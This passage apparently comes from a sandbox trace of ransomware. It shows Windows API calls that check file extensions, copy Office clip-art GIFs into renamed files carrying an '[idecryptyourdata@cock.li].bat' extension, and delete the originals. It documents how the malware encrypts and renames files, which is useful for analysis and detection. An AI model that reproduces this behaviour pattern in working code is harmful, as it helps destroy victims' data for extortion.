(lpString1=".jpg", lpString2=".GIF") returned 1 [0060.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.581] lstrlenW (lpString=".doc") returned 4 [0060.581] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.581] lstrlenW (lpString=".docx") returned 5 [0060.581] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.581] lstrlenW (lpString=".pdf") returned 4 [0060.581] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.581] lstrlenW (lpString=".xls") returned 4 [0060.581] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.581] lstrlenW (lpString=".xlsx") returned 5 [0060.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.581] lstrlenW (lpString=".ppt") returned 4 [0060.581] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.581] lstrlenW (lpString=".zip") returned 4 [0060.581] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.581] lstrlenW (lpString=".rar") returned 4 [0060.581] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.581] lstrlenW (lpString=".bz2") returned 4 [0060.581] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.581] lstrlenW (lpString=".7z") returned 3 [0060.581] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.581] lstrlenW (lpString=".dbf") returned 4 [0060.581] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.582] lstrlenW (lpString=".1cd") returned 4 [0060.582] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.582] lstrlenW (lpString=".jpg") returned 4 [0060.582] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.582] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.582] lstrlenW (lpString="AG00129_.GIF") returned 12 [0060.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.582] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=12482) returned 1 [0060.582] CloseHandle (hObject=0x368) returned 1 [0060.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 0x220 [0060.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.585] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.585] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0060.585] GetLastError () returned 0x0 [0060.585] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x30c2, lpOverlapped=0x0) returned 1 [0060.589] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x30d0, lpOverlapped=0x0) returned 1 [0060.589] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.589] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.590] SetEndOfFile (hFile=0x344) returned 1 [0060.590] CloseHandle (hObject=0x344) returned 1 [0060.591] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.591] SetEndOfFile (hFile=0x368) returned 1 [0060.591] CloseHandle (hObject=0x368) returned 1 [0060.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.592] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0060.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.592] lstrlenW (lpString=".doc") returned 4 [0060.592] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.592] lstrlenW (lpString=".docx") returned 5 [0060.592] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.592] lstrlenW (lpString=".pdf") returned 4 [0060.592] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.592] lstrlenW (lpString=".xls") returned 4 [0060.592] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.592] lstrlenW (lpString=".xlsx") returned 5 [0060.592] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.592] lstrlenW (lpString=".ppt") returned 4 [0060.592] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.592] lstrlenW (lpString=".zip") returned 4 [0060.592] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.592] lstrlenW (lpString=".rar") returned 4 [0060.592] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.592] lstrlenW (lpString=".bz2") returned 4 [0060.592] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.592] lstrlenW (lpString=".7z") returned 3 [0060.593] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString=".dbf") returned 4 [0060.593] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString=".1cd") returned 4 [0060.593] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString=".jpg") returned 4 [0060.593] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString=".doc") returned 4 [0060.593] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.593] lstrlenW (lpString=".docx") returned 5 [0060.593] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.593] lstrlenW (lpString=".pdf") returned 4 [0060.593] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.593] lstrlenW (lpString=".xls") returned 4 [0060.593] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.593] lstrlenW (lpString=".xlsx") returned 5 [0060.593] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.593] lstrlenW (lpString=".ppt") returned 4 [0060.593] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString=".zip") returned 4 [0060.593] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.593] lstrlenW (lpString=".rar") returned 4 [0060.593] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.593] lstrlenW (lpString=".bz2") returned 4 [0060.593] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.593] lstrlenW (lpString=".7z") returned 3 [0060.593] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.593] lstrlenW (lpString=".dbf") returned 4 [0060.593] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.594] lstrlenW (lpString=".1cd") returned 4 [0060.594] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0060.594] lstrlenW (lpString=".jpg") returned 4 [0060.594] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.594] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.594] lstrlenW (lpString="AG00130_.GIF") returned 12 [0060.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.595] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=5253) returned 1 [0060.595] CloseHandle (hObject=0x368) returned 1 [0060.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 0x220 [0060.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.595] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.595] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0060.596] GetLastError () returned 0x0 [0060.596] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1485, lpOverlapped=0x0) returned 1 [0060.723] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1490, lpOverlapped=0x0) returned 1 [0060.724] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.724] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.724] SetEndOfFile (hFile=0x344) returned 1 [0060.725] CloseHandle (hObject=0x344) returned 1 [0060.725] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.725] SetEndOfFile (hFile=0x368) returned 1 [0060.726] CloseHandle (hObject=0x368) returned 1 [0060.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.727] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0060.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.727] lstrlenW (lpString=".doc") returned 4 [0060.727] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.727] lstrlenW (lpString=".docx") returned 5 [0060.727] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.727] lstrlenW (lpString=".pdf") returned 4 [0060.727] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.727] lstrlenW (lpString=".xls") returned 4 [0060.727] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.727] lstrlenW (lpString=".xlsx") returned 5 [0060.727] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.727] lstrlenW (lpString=".ppt") returned 4 [0060.727] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.728] lstrlenW (lpString=".zip") returned 4 [0060.728] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.728] lstrlenW (lpString=".rar") returned 4 [0060.728] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.728] lstrlenW (lpString=".bz2") returned 4 [0060.728] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.728] lstrlenW (lpString=".7z") returned 3 [0060.728] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.728] lstrlenW (lpString=".dbf") returned 4 [0060.728] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.728] lstrlenW (lpString=".1cd") returned 4 [0060.728] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.728] lstrlenW (lpString=".jpg") returned 4 [0060.728] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.728] lstrlenW (lpString=".doc") returned 4 [0060.728] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.728] lstrlenW (lpString=".docx") returned 5 [0060.728] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.728] lstrlenW (lpString=".pdf") returned 4 [0060.728] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.728] lstrlenW (lpString=".xls") returned 4 [0060.728] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.728] lstrlenW (lpString=".xlsx") returned 5 [0060.729] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.729] lstrlenW (lpString=".ppt") returned 4 [0060.729] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.729] lstrlenW (lpString=".zip") returned 4 [0060.729] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.729] lstrlenW (lpString=".rar") returned 4 [0060.729] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.729] lstrlenW (lpString=".bz2") returned 4 [0060.729] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.729] lstrlenW (lpString=".7z") returned 3 [0060.729] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.729] lstrlenW (lpString=".dbf") returned 4 [0060.729] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.729] lstrlenW (lpString=".1cd") returned 4 [0060.729] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0060.729] lstrlenW (lpString=".jpg") returned 4 [0060.729] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.729] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.729] lstrlenW (lpString="AG00135_.GIF") returned 12 [0060.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0060.859] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=2596) returned 1 [0060.859] CloseHandle (hObject=0x340) returned 1 [0060.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 0x220 [0060.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0060.859] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.859] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0060.860] GetLastError () returned 0x0 [0060.860] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xa24, lpOverlapped=0x0) returned 1 [0061.374] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xa30, lpOverlapped=0x0) returned 1 [0061.376] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.376] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.376] SetEndOfFile (hFile=0x370) returned 1 [0061.376] CloseHandle (hObject=0x370) returned 1 [0061.377] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.377] SetEndOfFile (hFile=0x340) returned 1 [0061.378] CloseHandle (hObject=0x340) returned 1 [0061.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0061.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.378] lstrlenW (lpString=".doc") returned 4 [0061.378] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.378] lstrlenW (lpString=".docx") returned 5 [0061.378] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.378] lstrlenW (lpString=".pdf") returned 4 [0061.379] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.379] lstrlenW (lpString=".xls") returned 4 [0061.379] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.379] lstrlenW (lpString=".xlsx") returned 5 [0061.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.379] lstrlenW (lpString=".ppt") returned 4 [0061.379] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.379] lstrlenW (lpString=".zip") returned 4 [0061.379] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.379] lstrlenW (lpString=".rar") returned 4 [0061.379] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.379] lstrlenW (lpString=".bz2") returned 4 [0061.379] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.379] lstrlenW (lpString=".7z") returned 3 [0061.379] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.379] lstrlenW (lpString=".dbf") returned 4 [0061.379] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.379] lstrlenW (lpString=".1cd") returned 4 [0061.379] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.379] lstrlenW (lpString=".jpg") returned 4 [0061.379] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.380] lstrlenW (lpString=".doc") returned 4 [0061.380] lstrcmpiW (lpString1=".doc", 